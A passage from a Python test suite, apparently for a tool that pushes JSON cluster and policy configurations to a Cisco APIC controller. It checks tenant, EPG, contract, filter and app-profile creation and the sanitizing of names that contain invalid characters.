self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contractSubject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contractSubject.get_filters()), 2,
"num of filters in contract subject did not match " + child_contractSubject.name)
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_tenantname_in_configpush(self):
"""
this should test the tenant name. the tenant name pushed and the existing tenant name should match.
to test this first i am deleting the tenant if exits and then push the config,test the tenant name of existing tenant.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
def test_tenantname_for_invalidname_in_configpush(self):
"""
this should test the tenant name of tenant. the invalid characters in tenant name should be removed.
to test this first i am deleting the tenant if exits and then push the config,the tenant name in existing config from APIC should have valid characters.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1**#####{{{{}}}}}$$$$$$######################abcdefgh'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get(load_config.session)# names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == "configpush-test1____________________________________________abc":
self.assertTrue(True, "tennat exists with name " + tenant_name)
def test_appProfilename_in_configpush(self):
"""
this should test the application Profile name of tenant. the application Profile name pushed and the existing application Profile name should match.
to test this first i am deleting the tenant if exits and then push the config,the application Profile name in config and the application Profile name in existing tenant should match.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, app_name, "application profile with given name doesnot exist")
def test_appProfilename_for_invalidname_in_configpush(self):
"""
this should test the application Profile name of tenant. the invalid characters in application profile should be removed.
to test this first i am deleting the tenant if exits and then push the config,the application Profile name in existing config from APIC should have valid characters.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test**-#.{}'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, "app-test**-_.__", "application profile with given name doesnot exist")
def test_appProfilename_for_change_in_name_configpush(self):
"""
this should test the application Profile name of tenant.push the same json with diferent --app name for the second time.
so that the tenant should have the new application profile and the old one should be deleted
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test**-#.{}_changed'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
self.assertEqual(len(app_profiles), 1, "len(app_profiles)!=1")
for app in app_profiles:
self.assertEquals(app.name, "app-test__-_.___changed", "application profile with name is not updated to the changed name")
app_name = 'app-test_second**-#.{}_changed'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
self.assertEqual(len(app_profiles), 2, "len(app_profiles)!=2")
def test_l3ext_name_in_configpush(self):
"""
this should test the external routed network name of tenant. the external routed network name pushed and the existing external routed network name should match.
to test this first i am deleting the tenant if exits and then push the config,the external routed network name in config and the external routed network name in existing tenant should match.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test'
l3ext_name = 'l3external-test'
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tenant exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, app_name, "application profile with given name doesnot exist" + app_name)
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
l3ext_name,
"External routed network with name doesnot exist" +
l3ext_name)
def test_l3ext_name_for_invalidname_in_configpush(self):
"""
this should test the external routed network name of tenant. the invalid characters in external routed network name should be removed.
to test this first i am deleting the tenant if exits and then push the config,the external routed network name in existing config from APIC should have valid characters.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test'
l3ext_name = 'l3external-test***#####:::{{{}}}}'
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tenant exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, app_name, "application profile with given name doesnot exist" + app_name)
outsideL3s = tenant.get_children(OutsideL3)
print "outsideL3s[0].name is "+outsideL3s[0].name
self.assertEquals(
outsideL3s[0].name,
l3ext_name,
"External routed network with name doesnot exist" +
l3ext_name)
def test_manglenames_in_configpush(self):
"""
this should test the mangle_names method defined in apicserive.py.
which will make sure the length of the names of EPGS,Filters, app_profiles, nodes, contracts not to exceed 64 characters
and also replaces the invalid characters
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest_____..***()()()%%%%%%%%%%%%*_to_test_length_of_Cluster_name*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"external": true,
"route_tag": {
"subnet_mask": "240.0.0.0/24",
"name": "mcast-net"
},
"labels": [
],
"nodes": [
{
"ip": "240.0.0.0",
"name": "240.0.0.0/24",
"prefix_len": 24
}
]
},
{
"name": "Configpushtest2____..***()()()%%%%%%%%%%%%*_to_test_length_of_Cluster_name*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "N/A"
},
"labels": [
],
"nodes": [
{
"ip": "0.0.0.0",
"name": "0.0.0.0/0",
"prefix_len": 0
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy1_____..***()()()%%%%%%%%%%%%*to_test_length_of_Cluster_name*-(1)",
"dst_name": "Configpushtest-policy2_____..***()()()%%%%%%%%%%%%*to_test_length_of_Cluster_name*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
81,
81
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1***#####:::{{{}}}}'
app_name = 'app-test***#####:::{{{}}}}'
l3ext_name = 'l3external-test***#####:::{{{}}}}'
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == "configpush-test1__________________":
self.assertEqual("configpush-test1__________________", tenant.name, "tenant name mangled successfully")
app_profiles = tenant.get_children(AppProfile)
self.assertEqual(1, len(app_profiles), "num of app_profiles didnot match")
for app_profile in app_profiles:
self.assertEqual("app-test__________________", app_profile.name, "app_profile name mangled successfully")
epgs = app_profile.get_children(EPG)
self.assertEqual(1, len(epgs), "num of epgs didnot match")
for epg in epgs:
self.assertEqual(epg.name, "Configpushtest2____..____-1", "epg name mangled successfully")
filters = tenant.get_children(Filter)
self.assertEqual(1, len(filters), "num of filters didnot match")
outsideL3s = tenant.get_children(OutsideL3)
self.assertEqual(1, len(outsideL3s), "num of outsideL3s didnot match")
for outsideL3 in outsideL3s:
self.assertEqual("l3external-test__________________", outsideL3.name, "outsideL3 name mangled successfully")
outsideEpgs = outsideL3.get_children(OutsideEPG)
self.assertEqual(1, len(outsideEpgs), "num 0f outsideEpgs didnot match")
for outsideEpg in outsideEpgs:
self.assertEqual(outsideEpg.name, "Configpushtest_____..____-0", "outsideEpg name mangled successfully")
outsideNetworks = outsideEpg.get_children(OutsideNetwork)
self.assertEqual(1, len(outsideNetworks), "num 0f outsideEpgs didnot match")
for outsideNetwork in outsideNetworks:
self.assertEqual(outsideNetwork.name, "240.0.0.0_24", "outsideNetwork name mangled successfully")
contracts = tenant.get_children(Contract)
self.assertEqual(1, len(contracts), "num of contracts didnot match")
for contract in contracts:
self.assertEqual(contract.name, "Configpushtest_____..____-0::Configpushtest2____..____-1", "contract name mangled successfully")
contract_subjects = contract.get_children(ContractSubject)
self.assertEqual(1, len(contract_subjects), "num 0f contract_subjects didnot match")
for contract_subject in contract_subjects:
self.assertEqual(contract_subject.name, "Configpushtest_____..____-0::Configpushtest2____..____-1_Subject", "contract_subject name mangled successfully")
def test_update_configpush_for_clusters(self):
"""
after the initial push
adding a new cluster with name Configpushtest*-(3) without touching any others
the epgs count should be only 2 now
when we push this config to apic, the EPGs should stay as is and the new EPGS should not be added, count should match to two.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
},
{
"name": "Configpushtest*-(3)",
"id": "56c3d31561707035c0c13b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 2,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
self.assertNotEquals(existing_epg.name, "Configpushtest_-_3_-1", "the unwanted epg exists")
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
self.assertEqual(existing_contract.name, "Configpushtest_-_1_-0::Configpushtest_-_2_-1",
"contract name did not match with the config")
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
self.assertEqual(child_contract_subject.name,
"Configpushtest_-_1_-0::Configpushtest_-_2_-1_Subject",
"contract_subject name did not match with the config")
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_clusters_deletion(self):
"""
deleting a new cluster with name Configpushtest*-(3) without touching any others
the epgs count should be only 2 now
when we push this config tp apic, the EPGs should stay as is and the new EPGS should not be added, count should match to two.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 2,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
self.assertNotEquals(existing_epg.name, "Configpushtest_-_3_-1", "the unwanted epg exists")
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
self.assertEqual(existing_contract.name, "Configpushtest_-_1_-0::Configpushtest_-_2_-1",
"contract name did not match with the config")
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
self.assertEqual(child_contract_subject.name,
"Configpushtest_-_1_-0::Configpushtest_-_2_-1_Subject",
"contract_subject name did not match with the config")
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_filter_in_policies(self):
"""
deleting a filter 6.0.0 and adding a filter 17.0.0
when we push this config to apic, filter 6.0.0 should be deleted and filter 17.0.0 should be added in Filters
Also this change should be reflected in Contracts. the relation in ContractSubject should point to 17.0.0 instead of 6.0.0
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
1,
1
],
"proto": 17,
"action": "ALLOW"
}
]
}
]
}
"""
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == 'configpush-test':
existing_filters = tenant.get_children(Filter)
self.assertEquals(len(existing_filters), 2,
"filter count did not match for the pushed config and existing config")
for existing_filter in existing_filters:
self.assertTrue(existing_filter.name in ['1.0.0_Filter', '17.1.1_Filter'])
self.assertTrue(existing_filter.name != '6.0.0_Filter')
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
existing_epgs = app.get_children(EPG)
self.assertEquals(len(existing_epgs), 2,
"epgs count did not match for the pushed config and existing config")
for existing_epg in existing_epgs:
self.assertEqual(existing_epg.is_attributed_based, False,
"attribute based is true for EPG " + existing_epg.name)
if existing_epg.name == 'Configpushtest_-_1_-0':
self.assertEqual(len(existing_epg.get_all_consumed()), 1,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 0,
"provided EPG did not match for EPG " + existing_epg.name)
elif existing_epg.name == 'Configpushtest_-_2_-1':
self.assertEqual(len(existing_epg.get_all_consumed()), 0,
"consumed EPG did not match for EPG " + existing_epg.name)
self.assertEqual(len(existing_epg.get_all_provided()), 1,
"provided EPG did not match for EPG " + existing_epg.name)
existing_contracts = tenant.get_children(Contract)
self.assertEquals(len(existing_contracts), 1,
"contracts count did not match for the pushed config and existing config")
for existing_contract in existing_contracts:
for child_contract_subject in existing_contract.get_children(ContractSubject):
self.assertEqual(len(child_contract_subject.get_filters()), 2,
"num of filters in contract_subject did not match " + child_contract_subject.name)
for contract_subject_filter in child_contract_subject.get_filters():
self.assertTrue(contract_subject_filter.name in ['1.0.0_Filter', '17.1.1_Filter'])
self.assertTrue(contract_subject_filter.name != '6.0.0_Filter')
existing_bds = tenant.get_children(BridgeDomain)
self.assertEquals(len(existing_bds), 0,
"bridgeDomains count did not match for the pushed config and existing config")
existing_contexts = tenant.get_children(Context)
self.assertEquals(len(existing_contexts), 0,
"existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_for_filter_addition(self):
"""
adding a filter 18.0.0, 19.1.1
when we push this config to apic, filters 18.0.0 and 19.1.1 should be added in Filters and the count should be 4
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.127",
"name": "lnxdb-dr-vm-421"
},
{
"ip": "173.38.111.131",
"name": "lnxdb-dr-vm-422"
}
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
{
"ip": "173.38.111.126",
"name": "lnxdb-dr-vm-423"
},
{
"ip": "173.38.111.128",
"name": "lnxdb-dr-vm-424"
}
]
}
],
